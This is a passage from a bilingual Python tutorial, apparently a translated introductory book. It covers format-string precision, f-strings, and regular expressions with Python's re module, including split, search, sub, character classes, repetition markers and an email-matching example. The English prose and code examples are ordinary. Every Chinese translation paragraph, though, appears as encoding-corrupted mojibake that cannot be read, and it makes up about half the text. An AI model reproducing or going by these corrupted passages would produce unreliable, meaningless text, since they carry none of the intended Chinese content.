"pi = {0:.3f}".format(pi)
```
> As before, here the "``0``" refers to the index of the value to be inserted.
The "``:``" marks that format codes will follow.
The "``.3f``" encodes the desired precision: three digits beyond the decimal point, floating-point format.
ๅฆๅๆ่ฟฐ๏ผ`"0"`่กจ็คบๅๆฐไฝ็ฝฎๅบๅทใ`":"`่กจ็คบๆ ผๅผๅไปฃ็ ๅ้็ฌฆใ`".3f"`่กจ็คบๆตฎ็นๆฐๆ ผๅผๅ็ไปฃ็ ๏ผๅฐๆฐ็นๅไฟ็3ไฝใ
> This style of format specification is very flexible, and the examples here barely scratch the surface of the formatting options available.
For more information on the syntax of these format strings, see the [Format Specification](https://docs.python.org/3/library/string.html#formatspec) section of Python's online documentation.
่ฟๆ ท็ๆ ผๅผๅฎไน้ๅธธ็ตๆดป๏ผๆไปฌ่ฟ้็ไพๅญไป
ไป
ๆฏไธไธช็ฎๅ็ไป็ปใๆณ่ฆๆฅ้
ๆดๅคๆๅ
ณๆ ผๅผๅๅญ็ฌฆไธฒ็่ฏญๆณๅ
ๅฎน๏ผ่ฏทๅ่งPythonๅจ็บฟๆๆกฃๆๅ
ณ[ๆ ผๅผๅๅฎไน](https://docs.python.org/3/library/string.html#formatspec)็็ซ ่ใ
## fstring๏ผ่ฏ่
ๆทปๅ ๏ผ
Python3.6ไนๅ๏ผๆไพไบๅฆๅคไธ็ง็ตๆดป้ซๆ็ๆ ผๅผๅๅญ็ฌฆไธฒๆนๆณ๏ผๅซๅ`fstring`ใๅฏไปฅ็ดๆฅๅฐๅ้ๅผๆๅ
ฅๅฐๆ ผๅผๅๅญ็ฌฆไธฒไธญ่พๅบใ
ๅฆๅ้ขpi็ไพๅญ๏ผ
```
f"The value of pi is {pi}"
```
`fstring`้่ฟๅจๆ ผๅผๅๅญ็ฌฆไธฒๅๅ ไธf๏ผ็ถๅๅๆ ทๅฏไปฅ้่ฟ่ฑๆฌๅทๅฎไนๆ ผๅผๅ็ๅ
ๅฎน๏ผ่ฑๆฌๅทไธญๆฏๅ้ๅใ
ๅๅฆ๏ผ
```
first = 'A'
last = 'Z'
f"First letter: {first}. Last letter: {last}."
```
ๅ็๏ผๆฐๅญ็ๆ ผๅผๅไน็ฑปไผผ๏ผไป
้ๅจๅ้ๅๅไฝฟ็จ`":"`ๅฐๅ้ๅๅๆ ผๅผๅไปฃ็ ๅๅผๅณๅฏใ
ๅฆไธ้ข็ๆตฎ็นๆฐๆ ผๅผๅไพๅญ๏ผ
```
f"pi = {pi:.3f}"
```
## Flexible Pattern Matching with Regular Expressions
## ไฝฟ็จๆญฃๅ่กจ่พพๅผๅฎ็ฐๆจกๅผๅน้
> The methods of Python's ``str`` type give you a powerful set of tools for formatting, splitting, and manipulating string data.
But even more powerful tools are available in Python's built-in *regular expression* module.
Regular expressions are a huge topic; there are there are entire books written on the topic (including Jeffrey E.F. Friedlโs [*Mastering Regular Expressions, 3rd Edition*](http://shop.oreilly.com/product/9780596528126.do)), so it will be hard to do justice within just a single subsection.
Python็`str`็ฑปๅ็ๅ
งๅปบๆนๆณๆไพไบไธๆดๅฅๅผบๅคง็ๆ ผๅผๅใๅๅฒๅๆไฝๅญ็ฌฆไธฒ็ๅทฅๅ
ทใPythonๅ
งๅปบ็*ๆญฃๅ่กจ่พพๅผ*ๆจกๅๆไพไบๆดไธบๅผบๅคง็ๅญ็ฌฆไธฒๆไฝๅทฅๅ
ทใๆญฃๅ่กจ่พพๅผๆฏไธไธชๅทจๅคง็่ฏพ้ข๏ผๅจ่ฟไธช่ฏพ้ขไธๅฏไปฅๅไธๆฌไนฆๆฅ่ฏฆ็ปไป็ป๏ผๅ
ๆฌJeffrey E.F. Friedlๅ็[*Mastering Regular Expressions, 3rd Edition*](http://shop.oreilly.com/product/9780596528126.do)๏ผ๏ผๆไปฅๆๆๅจไธไธชๅฐ่ไธญไป็ปๅฎๅฎๆฏไธ็ฐๅฎ็ใ
> My goal here is to give you an idea of the types of problems that might be addressed using regular expressions, as well as a basic idea of how to use them in Python.
I'll suggest some references for learning more in [Further Resources on Regular Expressions](#Further-Resources-on-Regular-Expressions).
ไฝ่
ๆๆ้่ฟ่ฟไธชๅฐ่็ไป็ป๏ผ่ฝๅค่ฎฉ่ฏป่
ๅฏนไบไปไนๆ
ๅตไธ้่ฆไฝฟ็จๆญฃๅ่กจ่พพๅผไปฅๅๅจPythonไธญๆๅบๆฌ็ๆญฃๅ่กจ่พพๅผไฝฟ็จๆนๆณๆๅๆญฅ็ไบ่งฃใไฝ่
ๅปบ่ฎฎๅจ[ๆดๅค็ๆญฃๅ่กจ่พพๅผ่ตๆบ](#Further-Resources-on-Regular-Expressions)ไธญ่ฟไธๆญฅๆๅฑ้
่ฏปๅๅญฆไน ใ
> Fundamentally, regular expressions are a means of *flexible pattern matching* in strings.
If you frequently use the command-line, you are probably familiar with this type of flexible matching with the "``*``" character, which acts as a wildcard.
For example, we can list all the IPython notebooks (i.e., files with extension *.ipynb*) with "Python" in their filename by using the "``*``" wildcard to match any characters in between:
ไปๆๅบ็กไธๆฅ่ฏด๏ผๆญฃๅ่กจ่พพๅผๅ
ถๅฎๅฐฑๆฏไธ็งๅจๅญ็ฌฆไธฒไธญ่ฟ่ก*็ตๆดปๆจกๅผๅน้
*็ๆนๆณใๅฆๆไฝ ็ปๅธธไฝฟ็จๅฝไปค่ก๏ผไฝ ๅฏ่ฝๅทฒ็ปไน ๆฏไบ่ฟ็ง็ตๆดปๅน้
ๆบๅถ๏ผๆฏๆน่ฏด`"*"`ๅท๏ผๅฐฑๆฏไธไธชๅ
ธๅ็้้
็ฌฆใๆไปฌๆฅ็ไธไธชไพๅญ๏ผๆไปฌๅฏไปฅๅ็คบๆๆ็IPython notebook๏ผๆฉๅฑๅไธบ*.ipynb*๏ผ๏ผ็ถๅๆไปถๅไธญๅซๆ"Python"็ๆไปถๅ่กจใ
```
!ls *Python*.ipynb
```
> Regular expressions generalize this "wildcard" idea to a wide range of flexible string-matching sytaxes.
The Python interface to regular expressions is contained in the built-in ``re`` module; as a simple example, let's use it to duplicate the functionality of the string ``split()`` method:
ๆญฃๅ่กจ่พพๅผๅฐฑๆฏไธ็งๆณๅไบ็"้้
็ฌฆ"๏ผไฝฟ็จๆ ๅ็่ฏญๆณๅฏนๅญ็ฌฆไธฒ่ฟ่กๆจกๅผๅน้
ใPythonไธญ็ๆญฃๅ่กจ่พพๅผๅ่ฝๅ
ๅซๅจ`re`ๅ
งๅปบๆจกๅ๏ผไฝไธบไธไธช็ฎๅ็ไพๅญ๏ผๆไปฌไฝฟ็จ`re`้้ข็`split()`ๆนๆณๆฅๅฎ็ฐๅญ็ฌฆไธฒ`str`็ๅญ็ฌฆไธฒๅๅฒๅ่ฝ๏ผ
```
import re
regex = re.compile('\s+')
regex.split(line)
```
> Here we've first *compiled* a regular expression, then used it to *split* a string.
Just as Python's ``split()`` method returns a list of all substrings between whitespace, the regular expression ``split()`` method returns a list of all substrings between matches to the input pattern.
ๆฌไพไธญ๏ผๆไปฌ้ฆๅ
*็ผ่ฏไบ*ไธไธชๆญฃๅ่กจ่พพๅผ๏ผ็ถๅๆไปฌ็จ่ฟไธช่กจ่พพๅผๅฏนๅญ็ฌฆไธฒ่ฟ่ก*ๅๅฒ*ใๅฐฑๅ`str`็`split()`ๆนๆณไผไฝฟ็จ็ฉบ็ฝๅญ็ฌฆๅๅฒๅญ็ฌฆไธฒไธๆ ท๏ผๆญฃๅ่กจ่พพๅผ็`split()`ๆนๆณไนไผ่ฟๅๆๆๅน้
่พๅ
ฅ็ๆจกๅผ็ๅญ็ฌฆไธฒๅๅฒๅบๆฅ็ๅญ็ฌฆไธฒๅ่กจใ
> In this case, the input is ``"\s+"``: "``\s``" is a special character that matches any whitespace (space, tab, newline, etc.), and the "``+``" is a character that indicates *one or more* of the entity preceding it.
Thus, the regular expression matches any substring consisting of one or more spaces.
ๅจ่ฟไธชไพๅญ้๏ผ่พๅ
ฅ็ๆจกๅผๆฏ`"\s+"`๏ผ`"\s"`ๆฏๆญฃๅ่กจ่พพๅผ้้ข็ไธไธช็นๆฎ็ๅญ็ฌฆ๏ผไปฃ่กจ็ไปปไฝ็ฉบ็ฝๅญ็ฌฆ๏ผ็ฉบๆ ผ๏ผๅถ่กจ็ฌฆ๏ผๆข่ก็ญ๏ผ๏ผ`"+"`ๅทไปฃ่กจๅ้ขๅน้
ๅฐ็ๅญ็ฌฆๅบ็ฐไบ*ไธๆฌกๆๅคๆฌก*ใๅ ๆญค๏ผ่ฟไธชๆญฃๅ่กจ่พพๅผ็ๆๆๆฏๅน้
ไปปไฝไธไธชๆๅคไธช็็ฉบ็ฝ็ฌฆๅทใ
> The ``split()`` method here is basically a convenience routine built upon this *pattern matching* behavior; more fundamental is the ``match()`` method, which will tell you whether the beginning of a string matches the pattern:
่ฟ้็`split()`ๆนๆณๆฏไธไธชๅจ*ๆจกๅผๅน้
*ไนไธ็ๅญ็ฌฆไธฒๅๅฒๆนๆณ๏ผๅฏนไบๆญฃๅ่กจ่พพๅผๆฅ่ฏด๏ผๆดๅ ๅบ็ก็ๅฏ่ฝๆฏ`match()`ๆนๆณ๏ผๅฎไผ่ฟๅๅญ็ฌฆไธฒๆฏๅฆๆๅๅน้
ๅฐไบๆ็งๆจกๅผ๏ผ
```
for s in [" ", "abc ", " abc"]:
if regex.match(s):
print(repr(s), "matches")
else:
print(repr(s), "does not match")
```
> Like ``split()``, there are similar convenience routines to find the first match (like ``str.index()`` or ``str.find()``) or to find and replace (like ``str.replace()``).
We'll again use the line from before:
ๅฐฑๅ`split()`๏ผๆญฃๅ่กจ่พพๅผไธญไนๆ็ธๅบ็ๆนๆณ่ฝๅคๆพๅฐ้ฆไธชๅน้
ไฝ็ฝฎ๏ผๅฐฑๅ`str.index()`ๆ่
`str.find()`ไธๆ ท๏ผๆ่
ๆฏๆฅๆพๅๆฟๆข๏ผๅฐฑๅ`str.replace()`๏ผใๆไปฌ่ฟๆฏไปฅๅ้ข็้ฃ่กๅญ็ฌฆไธฒไธบไพ๏ผ
```
line = 'the quick brown fox jumped over a lazy dog'
```
> With this, we can see that the ``regex.search()`` method operates a lot like ``str.index()`` or ``str.find()``:
ๅฏไปฅไฝฟ็จ`regex.search()`ๆนๆณๅ`str.index()`ๆ่
`str.find()`้ฃๆ ทๆฅๆพๆจกๅผไฝ็ฝฎ๏ผ
```
line.index('fox')
regex = re.compile('fox')
match = regex.search(line)
match.start()
```
> Similarly, the ``regex.sub()`` method operates much like ``str.replace()``:
็ฑปไผผ็๏ผ`regex.sub()`ๆนๆณๅฐฑๅ`str.replace()`้ฃๆ ทๆฟๆขๅญ็ฌฆไธฒ๏ผ
```
line.replace('fox', 'BEAR')
regex.sub('BEAR', line)
```
> With a bit of thought, other native string operations can also be cast as regular expressions.
ๅ
ถไป็ๅๅงๅญ็ฌฆไธฒๆไฝไนๅฏไปฅ่ฝฌๆขไธบๆญฃๅ่กจ่พพๅผๆไฝใ
### A more sophisticated example
### ไธไธชๆดๅ ๅคๆ็ไพๅญ
> But, you might ask, why would you want to use the more complicated and verbose syntax of regular expressions rather than the more intuitive and simple string methods?
The advantage is that regular expressions offer *far* more flexibility.
ไบๆฏ๏ผไฝ ๅฐฑไผ้ฎ๏ผๆข็ถๅฆๆญค๏ผไธบไปไนๆไปฌ่ฆ็จๅคๆ็ๆญฃๅ่กจ่พพๅผ็ๆนๆณ๏ผ่ไธ็จ็ฎๅ็ๅญ็ฌฆไธฒๆนๆณๅข๏ผๅๅ ๅฐฑๆฏๆญฃๅ่กจ่พพๅผๆไพไบๆดๅค็็ตๆดปๆงใ
> Here we'll consider a more complicated example: the common task of matching email addresses.
I'll start by simply writing a (somewhat indecipherable) regular expression, and then walk through what is going on.
Here it goes:
ไธ้ขๆไปฌๆฅ่่ไธไธชๆดๅ ๅคๆ็ไพๅญ๏ผๅน้
็ตๅญ้ฎไปถๅฐๅใไฝ่
ไผไฝฟ็จไธไธช็ฎๅ็๏ผไฝๅ้พไปฅ็่งฃ็๏ผๆญฃๅ่กจ่พพๅผ๏ผ็ถๅๆไปฌ็็่ฟไธช่ฟ็จไธญๅ็ไบไปไนใๅฆไธ๏ผ
```
email = re.compile('\w+@\w+\.[a-z]{3}')
```
> Using this, if we're given a line from a document, we can quickly extract things that look like email addresses
ไฝฟ็จ่ฟไธชๆญฃๅ่กจ่พพๅผ๏ผๆไปฌๅฏไปฅๅพๅฟซๅฐๅจไธ่กๆๆฌไธญๆๅๅบๆฅๆๆ็็ตๅญ้ฎไปถๅฐๅ๏ผ
```
text = "To email Guido, try [email protected] or the older address [email protected]."
email.findall(text)
```
> (Note that these addresses are entirely made up; there are probably better ways to get in touch with Guido).
๏ผ่ฏทๆณจๆ่ฟไธคไธชๅฐๅ้ฝๆฏ็ผๆฐ็๏ผ่ฏๅฎๆๆดๅฅฝ็ๆนๅผ่ฝๅค่็ณปไธGuido๏ผ่ฏ่
ๆณจ๏ผGuidoๆฏPython็ๅๅงไบบ๏ผใ
> We can do further operations, like replacing these email addresses with another string, perhaps to hide addresses in the output:
ๆไปฌๅฏไปฅๅๆดๅค็ๅค็๏ผๆฏๆน่ฏดๅฐ็ตๅญ้ฎไปถๅฐๅๆฟๆขๆๅฆไธไธชๅญ็ฌฆไธฒ๏ผๆญคๅคๅไบไธไธช่ฑๆๅค็๏ผ
```
email.sub('[email protected]', text)
```
> Finally, note that if you really want to match *any* email address, the preceding regular expression is far too simple.
For example, it only allows addresses made of alphanumeric characters that end in one of several common domain suffixes.
So, for example, the period used here means that we only find part of the address:
ๆๅ๏ผๅฆๆไฝ ้่ฆๅน้
*ไปปไฝ*็็ตๅญ้ฎไปถๅฐๅ๏ผ้ฃไนไธ้ข็ๆญฃๅ่กจ่พพๅผ่ฟ่ฟ่ฟไธๅคใๅฎๅชๅ
่ฎธๅฐๅ็ฑๅญๆฏๆฐๅญ็ปๆๅนถไธไธ็บงๅๅไป
่ฝๆฏๆๅฐๆฐ็้็จๅๅใๅ ไธบไธ้ข็ๅฐๅๅซๆ็น`.`๏ผๅ ๆญคๅช่ฝๅน้
ๅฐไธ้จๅ็็ตๅญ้ฎไปถๅฐๅใ
```
email.findall('[email protected]')
```
> This goes to show how unforgiving regular expressions can be if you're not careful!
If you search around online, you can find some suggestions for regular expressions that will match *all* valid emails, but beware: they are much more involved than the simple expression used here!
่ฟ่กจๆไบๅฆๆไฝ ไธๅฐๅฟ็่ฏ๏ผๆญฃๅ่กจ่พพๅผไผๅ็ๅคๅฅๆช็้่ฏฏใๅฆๆไฝ ๅจ็ฝไธๆ็ดข็่ฏ๏ผไฝ ๅฏไปฅๅ็ฐไธไบ่ฝๅคๅน้
*ๆๆ*็็ตๅญ้ฎไปถๅฐๅ็ๆญฃๅ่กจ่พพๅผ๏ผไฝๆฏ๏ผๅฎไปฌๆฏๆไปฌ่ฟไธช็ฎๅ็็ๆฌ้พ็่งฃๅคไบใ
### Basics of regular expression syntax
### ๆญฃๅ่กจ่พพๅผๅบๆฌ่ฏญๆณ
> The syntax of regular expressions is much too large a topic for this short section.
Still, a bit of familiarity can go a long way: I will walk through some of the basic constructs here, and then list some more complete resources from which you can learn more.
My hope is that the following quick primer will enable you to use these resources effectively.
ๆญฃๅ่กจ่พพๅผ็่ฏญๆณๅฏนไบ่ฟไธชๅฐ่็ๅ
ๅฎนๆฅ่ฏดๆพๅพๅคชๅบๅคงไบใ็ถ่๏ผไบ่งฃไธไบๅบ็ก็ๅ
ๅฎน่ฝๅค่ฎฉ่ฏป่
่ตฐ็ๆด่ฟ๏ผไฝ่
ไผๅจ่ฟ้็ฎๅไป็ปไธไบๆๅบๆฌ็็ปๆ๏ผ็ถๅๅๅบไธไธชๅฎๆด็่ตๆบไปฅไพ่ฏป่
็ปง็ปญๆทฑๅ
ฅ็ ็ฉถๅๅญฆไน ใไฝ่
ๅธๆ้่ฟ่ฟไบ็ฎๅ็ๅบ็กๅ
ๅฎน่ฝ่ฎฉ่ฏป่
ๆดๅ ๆๆ็้
่ฏป้ฃไบ้ขๅค็่ตๆบใ
#### Simple strings are matched directly
#### ็ฎๅ็ๅญ็ฌฆไธฒไผ็ดๆฅๅน้
> If you build a regular expression on a simple string of characters or digits, it will match that exact string:
ๅฆๆไฝ ็ๆญฃๅ่กจ่พพๅผๅชๅ
ๆฌ็ฎๅ็ๅญ็ฌฆๅๆฐๅญ็็ปๅ๏ผ้ฃไนๅฎๅฐๅน้
่ช่บซ๏ผ
```
regex = re.compile('ion')
regex.findall('Great Expectations')
```
#### Some characters have special meanings
#### ็นๆฎๅซไน็ๅญ็ฌฆ
> While simple letters or numbers are direct matches, there are a handful of characters that have special meanings within regular expressions. They are:
```
. ^ $ * + ? { } [ ] \ | ( )
```
> We will discuss the meaning of some of these momentarily.
In the meantime, you should know that if you'd like to match any of these characters directly, you can *escape* them with a back-slash:
ๆฎ้็ๅญ็ฌฆๅๆฐๅญไผ็ดๆฅๅน้
๏ผ็ถๅๆญฃๅ่กจ่พพๅผไธญๅ
ๅซๅพๅค็็นๆฎๅญ็ฌฆ๏ผไปไปฌๆฏ๏ผ
```shell
. ^ $ * + ? { } [ ] \ | ( )
```
ไธไผๆไปฌไผ็จๅพฎ่ฏฆ็ป็ไป็ปๅ
ถไธญ็้จๅใๅๆถ๏ผไฝ ้่ฆ็ฅ้็ๆฏ๏ผๅฆๆไฝ ๅธๆ็ดๆฅๅน้
ไธ่ฟฐ็็นๆฎๅญ็ฌฆ็่ฏ๏ผไฝ ้่ฆไฝฟ็จๅๆๆ `"\"`ๆฅ่ฝฌไนไปไปฌ๏ผ
```
regex = re.compile(r'\$')
regex.findall("the cost is $20")
```
> The ``r`` preface in ``r'\$'`` indicates a *raw string*; in standard Python strings, the backslash is used to indicate special characters.
For example, a tab is indicated by ``"\t"``:
ไธ้ข็ๆญฃๅ่กจ่พพๅผไธญ็ๅ็ผ`r`ๆฏ่ฏดๆๆนๅญ็ฌฆไธฒๆฏไธไธช*ๅๅงๅญ็ฌฆไธฒ*; ๅจๆ ๅ็Pythonๅญ็ฌฆไธฒไธญ๏ผๅๆๆ ็จๆฅ่ฝฌไนๅนถ่กจ็คบไธไธช็นๆฎๅญ็ฌฆใไพๅฆ๏ผๅถ่กจ็ฌฆๅๆๅญ็ฌฆไธฒ็ๅฝขๅผไธบ`"\t"`๏ผ
```
print('a\tb\tc')
```
> Such substitutions are not made in a raw string:
่ฟ็ง่ฝฌไนไธไผๅบ็ฐๅจๅๅงๅญ็ฌฆไธฒไธญ๏ผ
```
print(r'a\tb\tc')
```
> For this reason, whenever you use backslashes in a regular expression, it is good practice to use a raw string.
ๅ ๆญค๏ผๅฝไฝ ้่ฆๅจๆญฃๅ่กจ่พพๅผไธญไฝฟ็จๅๆๆ ๆถ๏ผไฝฟ็จๅๅงๅญ็ฌฆไธฒๆฏไธไธชๅฅฝ็้ๆฉใ
#### Special characters can match character groups
#### ็นๆฎๅญ็ฌฆ่ฝๅน้
ไธ็ปๅญ็ฌฆ
> Just as the ``"\"`` character within regular expressions can escape special characters, turning them into normal characters, it can also be used to give normal characters special meaning.
These special characters match specified groups of characters, and we've seen them before.
In the email address regexp from before, we used the character ``"\w"``, which is a special marker matching *any alphanumeric character*. Similarly, in the simple ``split()`` example, we also saw ``"\s"``, a special marker indicating *any whitespace character*.
ๅฐฑๅๅๆๆ ๅจๆญฃๅ่กจ่พพๅผไธญ่ฝ่ฝฌไน็นๆฎๅญ็ฌฆ้ฃๆ ท๏ผๅๆๆ ไน่ฝๅฐไธไบๆฎ้ๅญ็ฌฆ่ฝฌไนๆ็นๆฎๅญ็ฌฆใ่ฟไบ็นๆฎๅญ็ฌฆ่ฝไปฃ่กจไธ็ปๆไธ็ฑป็ๅญ็ฌฆ็ปๅ๏ผๅฐฑๅๆไปฌๅจๅ้ข็ไพๅญๅฝไธญ็ๅฐ็้ฃๆ ทใๅจ็ตๅญ้ฎไปถๅฐๅ็ๆญฃๅ่กจ่พพๅผไธญ๏ผๆไปฌไฝฟ็จไบๅญ็ฌฆ`"\w"`๏ผ่ฟไธช็นๆฎๅญ็ฌฆไปฃ่กจ็*ๆๆ็ๅญๆฏๆฐๅญ็ฌฆๅท*ใๅๆ ท็๏ผๅจๅ้ข็`split()`ไพๅญไธญ๏ผ`"\s"`ไปฃ่กจ็*ๆๆ็็ฉบ็ฝๅญ็ฌฆ*ใ
> Putting these together, we can create a regular expression that will match *any two letters/digits with whitespace between them*:
ๆ่ฟไธคไธช็นๆฎ็ฌฆๅทๆพๅจไธ่ตท๏ผๆไปฌๅฐฑๅฏไปฅๆ้ ไธไธช*ไปปๆไธคไธชๅญๆฏๆๆฐๅญไน้ดๅซๆไธไธช็ฉบๆ ผ*็ๆญฃๅ่กจ่พพๅผ๏ผ
```
regex = re.compile(r'\w\s\w')
regex.findall('the fox is 9 years old')
```
> This example begins to hint at the power and flexibility of regular expressions.
่ฟไธชไพๅญๅทฒ็ปๅผๅงๅฑ็คบๆญฃๅ่กจ่พพๅผ็ๅ้ๅ็ตๆดปๆงไบใ
> The following table lists a few of these characters that are commonly useful:
> | Character | Description || Character | Description |
|-----------|-----------------------------||-----------|---------------------------------|
| ``"\d"`` | Match any digit || ``"\D"`` | Match any non-digit |
| ``"\s"`` | Match any whitespace || ``"\S"`` | Match any non-whitespace |
| ``"\w"`` | Match any alphanumeric char || ``"\W"`` | Match any non-alphanumeric char |
ไธ่กจๅๅบไบๅธธ็จ็็นๆฎ็ฌฆๅท:
| ็นๆฎ็ฌฆๅท | ๆ่ฟฐ || ็นๆฎ็ฌฆๅท | ๆ่ฟฐ |
|-----------|-----------------------------||-----------|---------------------------------|
| ``"\d"`` | ไปปๆๆฐๅญ || ``"\D"`` | ไปปๆ้ๆฐๅญ |
| ``"\s"`` | ไปปๆ็ฉบ็ฝ็ฌฆๅท || ``"\S"`` | ไปปๆ้็ฉบ็ฝ็ฌฆๅท |
| ``"\w"`` | ไปปๆๅญ็ฌฆๆๆฐๅญ || ``"\W"`` | ไปปๆ้ๅญ็ฌฆๆๆฐๅญ |
> This is *not* a comprehensive list or description; for more details, see Python's [regular expression syntax documentation](https://docs.python.org/3/library/re.html#re-syntax).
่ฟๅผ ่กจๅพไธๅฎๆด๏ผ้่ฆ่ฏฆ็ปๆ่ฟฐ๏ผ่ฏทๅ่ง๏ผ[ๆญฃๅ่กจ่พพๅผ่ฏญๆณๆๆกฃ](https://docs.python.org/3/library/re.html#re-syntax)ใ
#### Square brackets match custom character groups
#### ไธญๆฌๅทๅน้
่ชๅฎไน็ๅญ็ฌฆ็ป
> If the built-in character groups aren't specific enough for you, you can use square brackets to specify any set of characters you're interested in.
For example, the following will match any lower-case vowel:
ๅฆๆๅ
งๅปบ็ๅญ็ฌฆ็ปๅนถไธๆปก่ถณไฝ ็่ฆๆฑ๏ผไฝ ๅฏไปฅไฝฟ็จไธญๆฌๅทๆฅๆๅฎไฝ ้่ฆ็ๅญ็ฌฆ็ปใไพๅฆ๏ผไธไพไธญ็ๆญฃๅ่กจ่พพๅผๅน้
ไปปๆๅฐๅๅ
้ณๅญๆฏ๏ผ
```
regex = re.compile('[aeiou]')
regex.split('consequential')
```
> Similarly, you can use a dash to specify a range: for example, ``"[a-z]"`` will match any lower-case letter, and ``"[1-3]"`` will match any of ``"1"``, ``"2"``, or ``"3"``.
For instance, you may need to extract from a document specific numerical codes that consist of a capital letter followed by a digit. You could do this as follows:
ไฝ ่ฟๅฏไปฅไฝฟ็จๆจช็บฟ`"-"`ๆฅๆๅฎๅญ็ฌฆ็ป็่ๅด๏ผไพๅฆ๏ผ`"[a-z]"`ๅน้
ไปปๆๅฐๅๅญๆฏ๏ผ`"[1-3]"`ๅน้
`"1"`๏ผ`"2"`ๆ`"3"`ใไพๅฆ๏ผไฝ ๅธๆไปๆไธชๆๆกฃไธญๆๅๅบ็นๅฎ็ๆฐๅญไปฃ็ ๏ผ่ฏฅไปฃ็ ็ฑไธไธชๅคงๅๅญๆฏๅ้ข่ทไธไธชๆฐๅญ็ปๆใไฝ ๅฏไปฅ่ฟๆ ทๅ๏ผ
```
regex = re.compile('[A-Z][0-9]')
regex.findall('1043879, G2, H6')
```
#### Wildcards match repeated characters
#### ้้
็ฌฆๅน้
้ๅคๆฌกๆฐ็ๅญ็ฌฆ
> If you would like to match a string with, say, three alphanumeric characters in a row, it is possible to write, for example, ``"\w\w\w"``.
Because this is such a common need, there is a specific syntax to match repetitions โ curly braces with a number:
ๅฆๆไฝ ๆณ่ฆๅน้
ไธไธชๅญ็ฌฆไธฒๅ
ๅซ3ไธชๅญ็ฌฆๆๆฐๅญ๏ผๅฝ็ถไฝ ๅฏไปฅ่ฟๆ ทๅ`"\w\w\w"`ใไฝๆฏๅ ไธบ่ฟไธช้ๆฑๅคชๆฎ้ไบ๏ผๅ ๆญคๆญฃๅ่กจ่พพๅผๅฐๅฎๅๆไบ้ๅคๆฌกๆฐ็่งๅ - ไฝฟ็จ่ฑๆฌๅทไธญ็ๆฐๅญ่กจ็คบ้ๅค็ๆฌกๆฐ๏ผ
```
regex = re.compile(r'\w{3}')
regex.findall('The quick brown fox')
```
> There are also markers available to match any number of repetitions โ for example, the ``"+"`` character will match *one or more* repetitions of what precedes it:
ๅฝ็ถ่ฟๆไธไบๆ ่ฎฐ่ฝๅคๅน้
ไปปๆๆฌกๆฐ็้ๅค - ไพๅฆ๏ผ`"+"`ๅทไปฃ่กจๅ้ขๅน้
ๅฐ็ๅญ็ฌฆ้ๅค*ไธๆฌกๆๅคๆฌก*๏ผ
```
regex = re.compile(r'\w+')
regex.findall('The quick brown fox')
```
> The following is a table of the repetition markers available for use in regular expressions:
> | Character | Description | Example |
|-----------|-------------|---------|
| ``?`` | Match zero or one repetitions of preceding | ``"ab?"`` matches ``"a"`` or ``"ab"`` |
| ``*`` | Match zero or more repetitions of preceding | ``"ab*"`` matches ``"a"``, ``"ab"``, ``"abb"``, ``"abbb"``... |
| ``+`` | Match one or more repetitions of preceding | ``"ab+"`` matches ``"ab"``, ``"abb"``, ``"abbb"``... but not ``"a"`` |
| ``{n}`` | Match ``n`` repetitions of preeeding | ``"ab{2}"`` matches ``"abb"`` |
| ``{m,n}`` | Match between ``m`` and ``n`` repetitions of preceding | ``"ab{2,3}"`` matches ``"abb"`` or ``"abbb"`` |
ไธ่กจๅ็คบไบๆญฃๅ่กจ่พพๅผไธญๅฏ็จ็้ๅคๆ ่ฎฐ:
| ็นๆฎๅญ็ฌฆ | ๆ่ฟฐ | ไพๅญ |
|-----------|-------------|---------|
| ``?`` | ๅน้
0ๆฌกๆ1ๆฌก | ``"ab?"`` ๅน้
``"a"`` ๆ ``"ab"`` |
| ``*`` | ๅน้
0ๆฌกๆๅคๆฌก | ``"ab*"`` ๅน้
``"a"``, ``"ab"``, ``"abb"``, ``"abbb"``... |
| ``+`` | ๅน้
1ๆฌกๆๅคๆฌก | ``"ab+"`` ๅน้
``"ab"``, ``"abb"``, ``"abbb"``... ไฝไธๅน้
``"a"`` |
| ``{n}`` | ๅน้
ๆญฃๅฅฝnๆฌก | ``"ab{2}"`` ๅน้
``"abb"`` |
| ``{m,n}`` | ๅน้
ๆๅฐmๆฌกๆๅคงnๆฌก | ``"ab{2,3}"`` ๅน้
``"abb"`` ๆ ``"abbb"`` |
> With these basics in mind, let's return to our email address matcher:
ไบ่งฃไบไธ่ฟฐๅบ็กๅชๆฏๅ๏ผ่ฎฉๆไปฌๅๅฐๆไปฌ็็ตๅญ้ฎไปถๅฐๅ็ไพๅญ๏ผ
```
email = re.compile(r'\w+@\w+\.[a-z]{3}')
```
> We can now understand what this means: we want one or more alphanumeric character (``"\w+"``) followed by the *at sign* (``"@"``), followed by one or more alphanumeric character (``"\w+"``), followed by a period (``"\."`` โ note the need for a backslash escape), followed by exactly three lower-case letters.
็ฐๅจๆไปฌ่ฝ็่งฃ่ฟไธช่กจ่พพๅผไบ๏ผๆไปฌ้ฆๅ
้่ฆไธไธชๆๅคไธชๅญๆฏๆฐๅญๅญ็ฌฆ`"\w+"`๏ผ็ถๅ้่ฆๅญ็ฌฆ`"@"`๏ผ็ถๅ้่ฆไธไธชๆๅคไธชๅญๆฏๆฐๅญๅญ็ฌฆ`"\w+"`๏ผ็ถๅ้่ฆไธไธช`"\."`๏ผๆณจๆ่ฟ้ไฝฟ็จไบๅๆๆ ๏ผๅ ๆญค่ฟไธช็นๆฒกๆ็นๆฎๅซไน๏ผ๏ผๆๅๆไปฌ้่ฆๆญฃๅฅฝไธไธชๅฐๅๅญๆฏใ
> If we want to now modify this so that the Obama email address matches, we can do so using the square-bracket notation:
ๅฆๆๆไปฌ้่ฆไฟฎๆน่ฟไธชๆญฃๅ่กจ่พพๅผ๏ผ่ฎฉๅฎๅฏไปฅๅน้
ๅฅฅๅทด้ฉฌ็็ตๅญ้ฎไปถๅฐๅ็่ฏ๏ผๆไปฌๅฏไปฅไฝฟ็จไธญๆฌๅทๅๆณ๏ผ
```
email2 = re.compile(r'[\w.]+@\w+\.[a-z]{3}')
email2.findall('[email protected]')
```
> We have changed ``"\w+"`` to ``"[\w.]+"``, so we will match any alphanumeric character *or* a period.
With this more flexible expression, we can match a wider range of email addresses (though still not all โ can you identify other shortcomings of this expression?).
ไธ้ขๆไปฌๅฐ`"\w+"`ๆนๆไบ`"[\w.]+"`๏ผๅ ๆญคๆไปฌๅฏไปฅๅจ่ฟ้ๅน้
ไธไปปๆ็ๅญๆฏๆฐๅญ*ๆ*็นๅทใ็ป่ฟ่ฟไธไฟฎๆนๅ๏ผ่ฟไธๆญฃๅ่กจ่พพๅผ่ฝๅคๅน้
